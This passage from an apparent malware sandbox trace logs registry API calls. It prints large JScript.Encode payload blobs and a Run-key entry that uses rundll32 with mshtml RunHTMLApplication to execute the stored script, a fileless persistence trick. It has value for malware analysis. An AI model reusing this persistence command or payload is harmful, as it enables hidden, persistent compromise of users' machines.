1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0097.232] RegCloseKey (hKey=0x240) returned 0x0 [0097.232] Sleep (dwMilliseconds=0x1388) [0102.239] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0x240, lpdwDisposition=0x0) returned 0x0 [0102.240] NtSetValueKey (in: KeyHandle=0x240, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0102.240] RegSetValueExW (in: hKey=0x240, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( 